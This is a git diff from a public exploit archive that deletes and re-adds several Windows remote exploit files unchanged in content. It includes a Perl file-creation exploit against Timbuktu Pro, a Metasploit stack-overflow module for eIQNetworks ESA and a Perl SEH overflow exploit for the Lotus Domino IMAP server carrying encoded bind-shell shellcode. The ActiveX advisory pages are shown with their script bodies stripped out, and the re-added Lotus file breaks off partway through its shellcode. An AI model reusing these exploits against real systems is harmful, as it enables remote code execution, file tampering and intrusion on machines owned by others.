+++ b/platforms/windows/remote/4455.pl
@@ -1,126 +1,126 @@
-#!/usr/bin/perl
-#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO
-# Timbuktu Pro <= 8.6.5 Arbitrary File Deletion/Creation
-#
-# Bug & Exploit by titon [titon{at}bastardlabs{dot}com]
-#
-# Advisory: 
-# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=590
-#
-# Copyright: (c)2007 BastardLabs
-#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO
-#
-# Usage: $ ./timbuktu_sploit.pl 192.168.0.69 407
-#
-#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO
-use IO::Socket;
-use Time::HiRes qw(usleep);
-##
-## we start in the C:\Program Files\Timbuktu Pro\N1\ folder
-##
-$filename = &promptUser("Filename" ,"\\../../../pnw3d.bat");
-##$filename = &promptUser("Filename" ,"../../../pnw3d.bat");
-$payload = &promptUser("Payload ","echo pwwwnnn333ddd !!");
-##
-##payload can be either text or binary (in \x42\x69\x42 format)
-##
-$payload =~ s/\\x(..)/pack("C",hex($1))/egi;
-##
-## packet1 == “hello” packet
-##
-$packet1= "\x00\x01\x6b\x00\x00\xb0\x00\x23\x07\x22\x03\x07\xd6\x69\x6d\x3b".
-"\x27\xa8\xd0\xf2\xd6\x69\x6d\x3b\x27\xa8\xd0\xf2\x00\x09\x01\x41".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x01\x97\x01\x41\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\xb7\x1d".
-"\xbf\x42\x00\x00\x00\x00\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00";
-$packet2= "\xff";
-##
-## packet3 == packet containing the filename (with directory traversal)
-##
-$packet3= "\xfb\x00\x00\x00\x00\x54\x45\x58\x54\x74\x74\x78\x74\xc2\x32\x94".
-"\xcc\xc2\x32\x94\xd9\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00".
-"\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
-"\x00\x00\x00\x00\x00\x00\x00" . pack("C",length($filename)) . $filename ;
-$packet4= "\xf9\x00";
-##
-## packet5 == payload, the size of the payload is over 2 bytes
-## so we have 65535 bytes of data to play with
-##
-$packet5= "\xf8" . pack("n",length($payload)) . $payload ;
-$packet6= "\xf7";
-$packet7= "\xfa";
-$packet8= "\xfe";
-##
-##DELETE THE FILE (IF NECESSARY)
-##
-print "[+] Delete the file (if necessary)\n";
-print "[+] Connecting...\n";
-$remote = &connection("$ARGV[0]","$ARGV[1]");
-print "[+] Connected to $ARGV[0]:$ARGV[1]\n";
-print $remote $packet1; print "[+] Packet 1 Sent\n"; usleep (80000);
-print $remote $packet2; print "[+] Packet 2 Sent\n"; usleep (80000);
-print $remote $packet3; print "[+] Packet 3 Sent\n"; usleep (80000);
-##
-## we break the connection before it's completed (i.e before the \xfe)
-##
-close $remote;
-##
-##(RE)CREATE THE FILE
-##
-print "[+] (Re)Create the file with our content\n";
-print "[+] Connecting...\n";
-$remote = &connection("$ARGV[0]","$ARGV[1]");
-print "[+] Connected to $ARGV[0]:$ARGV[1]\n";
-print $remote $packet1; print "[+] Packet 1 Sent\n"; usleep (80000);
-print $remote $packet2; print "[+] Packet 2 Sent\n"; usleep (80000);
-print $remote $packet3; print "[+] Packet 3 Sent\n"; usleep (80000);
-print $remote $packet4; print "[+] Packet 4 Sent\n"; usleep (80000);
-print $remote $packet5; print "[+] Packet 5 Sent\n"; usleep (80000);
-print $remote $packet6; print "[+] Packet 6 Sent\n"; usleep (80000);
-print $remote $packet7; print "[+] Packet 7 Sent\n"; usleep (80000);
-print $remote $packet8; print "[+] Packet 8 Sent\n"; usleep (80000);
-close $remote;
-sub connection
-{
-local($dest,$port) = @_;
-my $remote;
-if (!$port or !dest) {
-print "\nUsage: $ ./timbuktu_sploit.pl 192.168.0.69 407\n\n"; exit; }
-else
-{
-$remote = IO::Socket::INET->new(
-Proto => tcp,
-PeerAddr => $dest,
-PeerPort => $port,
-Timeout => 1) or print "[-] Error: Could not establish a
-connection to $dest:$port\n" and exit;
-return $remote;
-}
-}
-sub promptUser {
-local($promptString,$defaultValue) = @_;
-if ($defaultValue) {
-print $promptString, "[", $defaultValue, "]: ";
-} else {
-print $promptString, ": ";
-}
-$| = 1; # force a flush after our print
-$_ = ; # get the input from STDIN
-chomp;
-if ("$defaultValue") {
-return $_ ? $_ : $defaultValue; # return $_ if it has a value
-} else {
-return $_;
-}
-}
-
-# milw0rm.com [2007-09-25]
-
-# milw0rm.com [2008-03-11]
+#!/usr/bin/perl
+#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO
+# Timbuktu Pro <= 8.6.5 Arbitrary File Deletion/Creation
+#
+# Bug & Exploit by titon [titon{at}bastardlabs{dot}com]
+#
+# Advisory: 
+# http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=590
+#
+# Copyright: (c)2007 BastardLabs
+#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO
+#
+# Usage: $ ./timbuktu_sploit.pl 192.168.0.69 407
+#
+#ooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOOooOO
+use IO::Socket;
+use Time::HiRes qw(usleep);
+##
+## we start in the C:\Program Files\Timbuktu Pro\N1\ folder
+##
+$filename = &promptUser("Filename" ,"\\../../../pnw3d.bat");
+##$filename = &promptUser("Filename" ,"../../../pnw3d.bat");
+$payload = &promptUser("Payload ","echo pwwwnnn333ddd !!");
+##
+##payload can be either text or binary (in \x42\x69\x42 format)
+##
+$payload =~ s/\\x(..)/pack("C",hex($1))/egi;
+##
+## packet1 == “hello” packet
+##
+$packet1= "\x00\x01\x6b\x00\x00\xb0\x00\x23\x07\x22\x03\x07\xd6\x69\x6d\x3b".
+"\x27\xa8\xd0\xf2\xd6\x69\x6d\x3b\x27\xa8\xd0\xf2\x00\x09\x01\x41".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x01\x97\x01\x41\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x04\xb7\x1d".
+"\xbf\x42\x00\x00\x00\x00\x7f\x00\x00\x01\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00";
+$packet2= "\xff";
+##
+## packet3 == packet containing the filename (with directory traversal)
+##
+$packet3= "\xfb\x00\x00\x00\x00\x54\x45\x58\x54\x74\x74\x78\x74\xc2\x32\x94".
+"\xcc\xc2\x32\x94\xd9\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00".
+"\x00\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".
+"\x00\x00\x00\x00\x00\x00\x00" . pack("C",length($filename)) . $filename ;
+$packet4= "\xf9\x00";
+##
+## packet5 == payload, the size of the payload is over 2 bytes
+## so we have 65535 bytes of data to play with
+##
+$packet5= "\xf8" . pack("n",length($payload)) . $payload ;
+$packet6= "\xf7";
+$packet7= "\xfa";
+$packet8= "\xfe";
+##
+##DELETE THE FILE (IF NECESSARY)
+##
+print "[+] Delete the file (if necessary)\n";
+print "[+] Connecting...\n";
+$remote = &connection("$ARGV[0]","$ARGV[1]");
+print "[+] Connected to $ARGV[0]:$ARGV[1]\n";
+print $remote $packet1; print "[+] Packet 1 Sent\n"; usleep (80000);
+print $remote $packet2; print "[+] Packet 2 Sent\n"; usleep (80000);
+print $remote $packet3; print "[+] Packet 3 Sent\n"; usleep (80000);
+##
+## we break the connection before it's completed (i.e before the \xfe)
+##
+close $remote;
+##
+##(RE)CREATE THE FILE
+##
+print "[+] (Re)Create the file with our content\n";
+print "[+] Connecting...\n";
+$remote = &connection("$ARGV[0]","$ARGV[1]");
+print "[+] Connected to $ARGV[0]:$ARGV[1]\n";
+print $remote $packet1; print "[+] Packet 1 Sent\n"; usleep (80000);
+print $remote $packet2; print "[+] Packet 2 Sent\n"; usleep (80000);
+print $remote $packet3; print "[+] Packet 3 Sent\n"; usleep (80000);
+print $remote $packet4; print "[+] Packet 4 Sent\n"; usleep (80000);
+print $remote $packet5; print "[+] Packet 5 Sent\n"; usleep (80000);
+print $remote $packet6; print "[+] Packet 6 Sent\n"; usleep (80000);
+print $remote $packet7; print "[+] Packet 7 Sent\n"; usleep (80000);
+print $remote $packet8; print "[+] Packet 8 Sent\n"; usleep (80000);
+close $remote;
+sub connection
+{
+local($dest,$port) = @_;
+my $remote;
+if (!$port or !dest) {
+print "\nUsage: $ ./timbuktu_sploit.pl 192.168.0.69 407\n\n"; exit; }
+else
+{
+$remote = IO::Socket::INET->new(
+Proto => tcp,
+PeerAddr => $dest,
+PeerPort => $port,
+Timeout => 1) or print "[-] Error: Could not establish a
+connection to $dest:$port\n" and exit;
+return $remote;
+}
+}
+sub promptUser {
+local($promptString,$defaultValue) = @_;
+if ($defaultValue) {
+print $promptString, "[", $defaultValue, "]: ";
+} else {
+print $promptString, ": ";
+}
+$| = 1; # force a flush after our print
+$_ = ; # get the input from STDIN
+chomp;
+if ("$defaultValue") {
+return $_ ? $_ : $defaultValue; # return $_ if it has a value
+} else {
+return $_;
+}
+}
+
+# milw0rm.com [2007-09-25]
+
+# milw0rm.com [2008-03-11]
diff --git a/platforms/windows/remote/4468.html b/platforms/windows/remote/4468.html
index 865423452..01af430ee 100755
--- a/platforms/windows/remote/4468.html
+++ b/platforms/windows/remote/4468.html
@@ -1,53 +1,53 @@
-
-
-
-
-
-
-
    
-
-
    
-
-
-
-
-
    -  ----
- | y0! |
-  ----
-          \  \_\_    _/_/
-           \     (oo)\_______
-                 |_|\        )*
-                     ||----w |
-                     ||     ||
-
    
-
-
-
-# milw0rm.com [2007-09-29]
+
+
+
+
+
+
+
    
+
+
    
+
+
+
+
+
    +  ----
+ | y0! |
+  ----
+          \  \_\_    _/_/
+           \     (oo)\_______
+                 |_|\        )*
+                     ||----w |
+                     ||     ||
+
    
+
+
+
+# milw0rm.com [2007-09-29]
diff --git a/platforms/windows/remote/4487.html b/platforms/windows/remote/4487.html
index fd886d402..b99738c34 100755
--- a/platforms/windows/remote/4487.html
+++ b/platforms/windows/remote/4487.html
@@ -1,34 +1,34 @@
-
    ------------------------------------------------------------------------------
- Pegasus Imaging ThumbnailXpress 1.0 Remote Arbitrary File Deletion
- url: http://www.pegasusimaging.com/
-
- Author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
-
- This was written for educational purpose. Use it at your own risk.
- Author will be not responsible for any damage.
-
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-
- Description:
- Component name: PegasusImaging.ActiveX.ThumbnailXpress1.dll
- Version: 1.0.45.0
- This control contains an insecure "CacheFile()" method that delete, once
- the process is terminated, the file passed as argument.
------------------------------------------------------------------------------
-
-
-
-
-
-
-
    
-
-# milw0rm.com [2007-10-05]
+
    +-----------------------------------------------------------------------------
+ Pegasus Imaging ThumbnailXpress 1.0 Remote Arbitrary File Deletion
+ url: http://www.pegasusimaging.com/
+
+ Author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not responsible for any damage.
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+
+ Description:
+ Component name: PegasusImaging.ActiveX.ThumbnailXpress1.dll
+ Version: 1.0.45.0
+ This control contains an insecure "CacheFile()" method that delete, once
+ the process is terminated, the file passed as argument.
+-----------------------------------------------------------------------------
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-10-05]
diff --git a/platforms/windows/remote/4488.html b/platforms/windows/remote/4488.html
index ce26cf264..6a821bc73 100755
--- a/platforms/windows/remote/4488.html
+++ b/platforms/windows/remote/4488.html
@@ -1,37 +1,37 @@
-
    ------------------------------------------------------------------------------
- Pegasus Imaging ImagXpress 8.0 Remote Arbitrary File Overwrite
- url: http://www.pegasusimaging.com/
-
- Author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
-
- This was written for educational purpose. Use it at your own risk.
- Author will be not responsible for any damage.
-
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
-
- Description:
- Component name: PegasusImaging.ActiveX.ImagXpress8.dll
- Vesrion: 8.0.41.0
- This component contains an insecure "CompactFile()" which overwrites
- arbitrary files on user's pc.
- Passing to the first parameter (sourceFile) of the method an existing
- file as argument (e.g. a well known file as cmd.exe), the file passed
- as argument to the second parameter (destFile) will be overwrite.
------------------------------------------------------------------------------
-
-
-
-
-
-
-
    
-
-# milw0rm.com [2007-10-05]
+
    +-----------------------------------------------------------------------------
+ Pegasus Imaging ImagXpress 8.0 Remote Arbitrary File Overwrite
+ url: http://www.pegasusimaging.com/
+
+ Author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not responsible for any damage.
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+
+ Description:
+ Component name: PegasusImaging.ActiveX.ImagXpress8.dll
+ Vesrion: 8.0.41.0
+ This component contains an insecure "CompactFile()" which overwrites
+ arbitrary files on user's pc.
+ Passing to the first parameter (sourceFile) of the method an existing
+ file as argument (e.g. a well known file as cmd.exe), the file passed
+ as argument to the second parameter (destFile) will be overwrite.
+-----------------------------------------------------------------------------
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-10-05]
diff --git a/platforms/windows/remote/45.c b/platforms/windows/remote/45.c
index cab84fbf8..e81d2e6c2 100755
--- a/platforms/windows/remote/45.c
+++ b/platforms/windows/remote/45.c
@@ -256,6 +256,6 @@ exit(0);
 
 return 0;
 }
-
-
-// milw0rm.com [2003-06-23]
+
+
+// milw0rm.com [2003-06-23]
diff --git a/platforms/windows/remote/4506.html b/platforms/windows/remote/4506.html
index 0734cef8e..bab204a40 100755
--- a/platforms/windows/remote/4506.html
+++ b/platforms/windows/remote/4506.html
@@ -1,43 +1,43 @@
-
    ------------------------------------------------------------------------------
- Microsoft Visual FoxPro 6.0 FPOLE.OCX Arbitrary Command Execution
- url: http://www.microsoft.com
-
- Author: shinnai
- mail: shinnai[at]autistici[dot]org
- site: http://shinnai.altervista.org
-
- This was written for educational purpose. Use it at your own risk.
- Author will be not responsible for any damage.
-
- Technical Details
- File: FPOLE.OCX
- Version: 6.0.8450.0
- MD5: E9A1D8CFE6C791BA76B7343FA39752FB
- 
- Marked as:
- RegKey Safe for Script: False
- RegKey Safe for Init: False
- Implements IObjectSafety: True
- IDisp Safe: Safe for untrusted: caller
-
- Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
- 
- When I released this http://www.milw0rm.com/exploits/4369 I never thought
- it was possible to use the "FoxDoCmd()" method to run applications passed
- as argument but...
------------------------------------------------------------------------------
-
-
-
-
-
-
-
-
    
-
-# milw0rm.com [2007-10-09]
+
    +-----------------------------------------------------------------------------
+ Microsoft Visual FoxPro 6.0 FPOLE.OCX Arbitrary Command Execution
+ url: http://www.microsoft.com
+
+ Author: shinnai
+ mail: shinnai[at]autistici[dot]org
+ site: http://shinnai.altervista.org
+
+ This was written for educational purpose. Use it at your own risk.
+ Author will be not responsible for any damage.
+
+ Technical Details
+ File: FPOLE.OCX
+ Version: 6.0.8450.0
+ MD5: E9A1D8CFE6C791BA76B7343FA39752FB
+ 
+ Marked as:
+ RegKey Safe for Script: False
+ RegKey Safe for Init: False
+ Implements IObjectSafety: True
+ IDisp Safe: Safe for untrusted: caller
+
+ Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
+ 
+ When I released this http://www.milw0rm.com/exploits/4369 I never thought
+ it was possible to use the "FoxDoCmd()" method to run applications passed
+ as argument but...
+-----------------------------------------------------------------------------
+
+
+
+
+
+
+
+
    
+
+# milw0rm.com [2007-10-09]
diff --git a/platforms/windows/remote/4526.html b/platforms/windows/remote/4526.html
index 391e0f3b0..f806e3331 100755
--- a/platforms/windows/remote/4526.html
+++ b/platforms/windows/remote/4526.html
@@ -1,20 +1,20 @@
-
    -Found by: Katatafish (karatatata{at}hush{dot}com)
-software:PBEmail 7 ActiveX Edition
-Vendor: http://www.perfectionbytes.com
-vulnerability: Insecure method
-SaveSenderToXml(XmlFilePath: BSTR); stdcall; in PBEmail7Ax.dll
-Tested on Internet explorer 7 with Windows XP SP 2.
-Thanks: str0ke
-
-
    
-
-	
-
-
-# milw0rm.com [2007-10-12]
+
    +Found by: Katatafish (karatatata{at}hush{dot}com)
+software:PBEmail 7 ActiveX Edition
+Vendor: http://www.perfectionbytes.com
+vulnerability: Insecure method
+SaveSenderToXml(XmlFilePath: BSTR); stdcall; in PBEmail7Ax.dll
+Tested on Internet explorer 7 with Windows XP SP 2.
+Thanks: str0ke
+
+
    
+
+	
+
+
+# milw0rm.com [2007-10-12]
diff --git a/platforms/windows/remote/4566.rb b/platforms/windows/remote/4566.rb
index f8b9646c5..a85e92116 100755
--- a/platforms/windows/remote/4566.rb
+++ b/platforms/windows/remote/4566.rb
@@ -1,84 +1,84 @@
-##
-# $Id: eiqnetworks_esa.rb 4529 2007-03-12 01:08:18Z hdm $
-##
-
-##
-# This file is part of the Metasploit Framework and may be subject to 
-# redistribution and commercial restrictions. Please see the Metasploit
-# Framework web site for more information on licensing and terms of use.
-# http://metasploit.com/projects/Framework/
-##
-
-
-require 'msf/core'
-
-module Msf
-
-class Exploits::Windows::Misc::Eiqnetworks_SEARCHREPORT < Msf::Exploit::Remote
-
-	include Exploit::Remote::Tcp
-	include Exploit::Remote::Egghunter
-
-	def initialize(info = {})
-		super(update_info(info,
-			'Name'           => 'eIQNetworks ESA SEARCHREPORT Overflow',
-			'Description'    => %q{
-				This module exploits a stack overflow in eIQnetworks
-				Enterprise Security Analyzer. During the processing of
-				long arguments to the SEARCHREPORT command, a stack-based
-				buffer overflow occurs. 
-			},
-			'Author'         => [ 'ri0t ',   ],
-			'Version'        => '$Revision: 4529 $',
-			'References'     => 
-				[
-				],
-			'DefaultOptions' =>
-				{
-					'EXITFUNC' => 'seh',
-				},
-			'Payload'        =>
-				{
-					'Space'    => 1962,
-					'BadChars' => "\x00",
-					'ActiveTimeout' => 15,
-				},
-			'Platform'       => 'win',
-			
-			'Targets'        =>
-				[
-					['EnterpriseSecurityAnalyzer v2.5 Universal', { 'Ret' => 0x55322a6a, 'Offset' => 1962 } ],  
-				
-				],
-
-			'Privileged'     => false,
-
-                        'DisclosureDate' => ''
-
-                        ))
-
-			register_options(
-			[
-				Opt::RPORT(10616)
-			], self.class)
-	end
-
-	def exploit
-		connect
-
-		print_status("Trying target #{target.name}...")
-	
-		hunter = generate_egghunter()
-		egg = hunter[1]
-		filler =  make_nops(target['Offset'] - payload.encoded.length)
-		sploit =  "SEARCHREPORT&" + egg + egg + filler + payload.encoded + make_nops(12) + [target.ret].pack('V') + make_nops(12) + hunter[0] +  "&";
-		puts sploit
-		sock.put(sploit)
-		handler
-		disconnect	
-	end
-
-end
-end
-
-# milw0rm.com [2007-10-24]
+##
+# $Id: eiqnetworks_esa.rb 4529 2007-03-12 01:08:18Z hdm $
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+
+require 'msf/core'
+
+module Msf
+
+class Exploits::Windows::Misc::Eiqnetworks_SEARCHREPORT < Msf::Exploit::Remote
+
+	include Exploit::Remote::Tcp
+	include Exploit::Remote::Egghunter
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'eIQNetworks ESA SEARCHREPORT Overflow',
+			'Description'    => %q{
+				This module exploits a stack overflow in eIQnetworks
+				Enterprise Security Analyzer. During the processing of
+				long arguments to the SEARCHREPORT command, a stack-based
+				buffer overflow occurs. 
+			},
+			'Author'         => [ 'ri0t ',   ],
+			'Version'        => '$Revision: 4529 $',
+			'References'     => 
+				[
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'seh',
+				},
+			'Payload'        =>
+				{
+					'Space'    => 1962,
+					'BadChars' => "\x00",
+					'ActiveTimeout' => 15,
+				},
+			'Platform'       => 'win',
+			
+			'Targets'        =>
+				[
+					['EnterpriseSecurityAnalyzer v2.5 Universal', { 'Ret' => 0x55322a6a, 'Offset' => 1962 } ],  
+				
+				],
+
+			'Privileged'     => false,
+
+                        'DisclosureDate' => ''
+
+                        ))
+
+			register_options(
+			[
+				Opt::RPORT(10616)
+			], self.class)
+	end
+
+	def exploit
+		connect
+
+		print_status("Trying target #{target.name}...")
+	
+		hunter = generate_egghunter()
+		egg = hunter[1]
+		filler =  make_nops(target['Offset'] - payload.encoded.length)
+		sploit =  "SEARCHREPORT&" + egg + egg + filler + payload.encoded + make_nops(12) + [target.ret].pack('V') + make_nops(12) + hunter[0] +  "&";
+		puts sploit
+		sock.put(sploit)
+		handler
+		disconnect	
+	end
+
+end
+end
+
+# milw0rm.com [2007-10-24]
diff --git a/platforms/windows/remote/4574.pl b/platforms/windows/remote/4574.pl
index f4a0fd277..2f0518661 100755
--- a/platforms/windows/remote/4574.pl
+++ b/platforms/windows/remote/4574.pl
@@ -1,187 +1,187 @@
-#!perl
-#
-# "IBM Lotus Domino" IMAP4 Server 'LSUB' Command Exploit
-#
-# Author:  Manuel Santamarina Suarez
-# e-Mail:  FistFuXXer@gmx.de
-#
-
-use IO::Socket;
-use File::Basename;
-
-#
-# destination TCP port
-#
-$port = 143;
-
-#
-# SE handler
-#
-# You can only use HEX values from 0x20 to 0x7e! (printable ASCII characters)
-# You must use a POP/POP/RET sequence that doesn't modify the ESP register or
-# the shellcode decoder will fail.
-#
-$seh = reverse( "\x60\x21\x53\x4E" );  # POP EDI/POP EBP/RET
-                                       # nnotes.6021534e
-                                       # universal on Lotus Domino 7.0.2FP1
-
-
-#
-# Shellcode
-# You can only use HEX values from 0x20 to 0x7e! (printable ASCII characters)
-#
-# 1. Step: Modified Win32 Bind Shellcode (EXITFUNC=thread, LPORT=4444)
-# 2. Step: Encoded with Alpha 2.0 (BASEADDRESS=ESP)
-#
-$sc = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIeyZiMSKYnPYI".
-      "JNJy0tGTydqKOqcCDS2wDWLMnzmSxkYlkRYdLksMRFhWoOZNbRe5mxBWuVHvqcFS".
-      "7vIORKmLzQmOToWf3RvqWhTOUViUD7Wfqvn3yLusEVmKMiuvBmuSkKNsrmzNpPhV".
-      "bgOgpVIEsVRNpl2cOYnRDbl26fJePsR6cVkLKlUKO6TQWx6kLLpqRtGKVftSekP3".
-      "OaKKlTgVV6KNyLqDoMtQB75KWvJJ0KoJGvzzSog9M5ftwiwisQkzMxiQXkyYDqqo".
-      "ONy8uocPKNMxUX2crRPJWOKlsPavRLQWQbPLs8MNphKLZvXznenx5RamlOQumWQo".
-      "btLSI2OJYJe5mQ0DyNyY7tctxNJiR4pDcBpJUaCOmLo6uaPDVdcKyRSOUyOpewzp".
-      "ZzPeMQSMmMZkdBkXaMZRl3lzLcBSUPM8skzitBixQMibMbaNfkXSWp9xSkzjUSRc".
-      "hX2EMWOt8eQmdn8QJTHMNHIQKhpemWRQYwkNvQSOXnL7yN9bXgiZfnGNQQUClp3M".
-      "HIECH5WVPM59KMkYZolwliSeoQwyJzBMH5FQYlMlJEHhLiLdOkQu5rpS2RrltL70".
-      "YO8KFfqVm7mKtFcvxXzkoXKwxe6WLNuB3sYYY8kqm73UlhEp0rQZKl1PbQDYOcPs".
-      "RRRlfem8aMibLxKi0mij5TKXQKcUk76wlMLZA";
-
-#
-# JUMP to 'ESP adjustment' and shellcode
-#
-$jmp = "\x74\x20".  # JE SHORT
-       "\x75\x20";  # JNZ SHORT
-
-
-#
-#
-# Don't edit anything after this line
-#
-#
-
-$sc_limit = 2300;
-
-sub usage {
-    print "Usage: " . basename( $0 ) . " [target] [IPv4 address] [username] [password]\n".
-          "Example: ". basename( $0 ) . " 1 192.168.1.19 \"Bill Gates/ServerName\" \"P4ssw0rd\"\n".
-          "\n".
-          "Targets:\n".
-          "[1]  Lotus Domino 7.0.2FP1 on Windows Server 2000 SP4\n".
-          "[2]  Lotus Domino 7.0.2FP1 on Windows Server 2003 SP2\n";
-    exit;
-}
-
-
-# Net::IP::ip_is_ipv4
-sub ip_is_ipv4 {
-    my $ip = shift;
-
-    unless ($ip =~ m/^[\d\.]+$/) {
-        return 0;
-    }
-
-    if ($ip =~ m/^\./) {
-        return 0;
-    }
-
-    if ($ip =~ m/\.$/) {
-        return 0;
-    }
-
-    if ($ip =~ m/^(\d+)$/ and $1 < 256) {
-        return 1
-    }
-
-    my $n = ($ip =~ tr/\./\./);
-
-    unless ($n >= 0 and $n < 4) {
-        return 0;
-    }
-
-    if ($ip =~ m/\.\./) {
-        return 0;
-    }
-
-    foreach (split /\./, $ip) {
-        unless ($_ >= 0 and $_ < 256) {
-            return 0;
-        }
-    }
-    
-    return 1;
-}
-
-
-print "--------------------------------------------------------\n".
-      ' "IBM Lotus Domino" IMAP4 Server \'LSUB\' Command Exploit'."\n".
-      "--------------------------------------------------------\n\n";
-
-if( ($#ARGV+1) != 4 ) {
-    &usage;
-}
-
-$user = $ARGV[2];
-$pass = $ARGV[3];
-
-# Windows 2000 SP4
-if( $ARGV[0] == 1 ) {
-    $popad = "\x41" x 3 .  # INC ECX
-             "\x61" x 51;  # POPAD
-}
-# Windows 2003 SP2
-elsif( $ARGV[0] == 2 ) {
-    $popad = "\x41" x 2 .  # INC ECX
-             "\x61" x 52;  # POPAD
-}
-else {
-    &usage;
-}
-    
-if( ip_is_ipv4( $ARGV[1] ) ) {
-    $ip = $ARGV[1];
-}
-else
-{
-    &usage;
-}
-
-if( length( $sc ) > $sc_limit ) {
-    print "[-] Error: Shellcode's size exceeds $sc_limit bytes!\n";
-    exit;
-}
-
-print "[+] Connecting to $ip:$port...\n";
-
-$sock = IO::Socket::INET->new (
-    PeerAddr => $ip,
-    PeerPort => $port,
-    Proto    => 'tcp',
-    Timeout  => 2
-) or print "[-] Error: Couldn't establish a connection to $ip:$port!\n" and exit;
-
-print "[+] Connected.\n";
-
-$mailbox = "\x44" x 280 . $jmp . $seh . "\x44" x 26 . $popad . $sc . "\x44" x 3000;
-$sock->recv( $recv, 1024 );
-$sock->send( "a001 LOGIN \"$user\" \"$pass\"\r\n" );
-$sock->recv( $recv, 1024 );
-
-if( $recv ne "a001 OK LOGIN completed\r\n" ) {
-    print "[-] Error: Invalid username or password!\n";
-    exit;
-}
-
-print "[+] Successfully logged in.\n".
-      "[+] Trying to overwrite and control the SE handler...\n";
-
-$sock->send( "a002 SUBSCRIBE {" . length( $mailbox ) . "}\r\n" );
-$sock->recv( $recv, 1024 );
-$sock->send( "$mailbox\r\n" );
-$sock->recv( $recv, 1024 );
-$sock->send( "a003 LSUB arg1 arg2\r\n" );
-sleep( 3 );
-close( $sock );
-
-print "[+] Done. Now check for a bind shell on $ip:4444!\n";
-
-# milw0rm.com [2007-10-27]
+#!perl
+#
+# "IBM Lotus Domino" IMAP4 Server 'LSUB' Command Exploit
+#
+# Author:  Manuel Santamarina Suarez
+# e-Mail:  FistFuXXer@gmx.de
+#
+
+use IO::Socket;
+use File::Basename;
+
+#
+# destination TCP port
+#
+$port = 143;
+
+#
+# SE handler
+#
+# You can only use HEX values from 0x20 to 0x7e! (printable ASCII characters)
+# You must use a POP/POP/RET sequence that doesn't modify the ESP register or
+# the shellcode decoder will fail.
+#
+$seh = reverse( "\x60\x21\x53\x4E" );  # POP EDI/POP EBP/RET
+                                       # nnotes.6021534e
+                                       # universal on Lotus Domino 7.0.2FP1
+
+
+#
+# Shellcode
+# You can only use HEX values from 0x20 to 0x7e! (printable ASCII characters)
+#
+# 1. Step: Modified Win32 Bind Shellcode (EXITFUNC=thread, LPORT=4444)
+# 2. Step: Encoded with Alpha 2.0 (BASEADDRESS=ESP)
+#
+$sc = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIeyZiMSKYnPYI".
+      "JNJy0tGTydqKOqcCDS2wDWLMnzmSxkYlkRYdLksMRFhWoOZNbRe5mxBWuVHvqcFS".
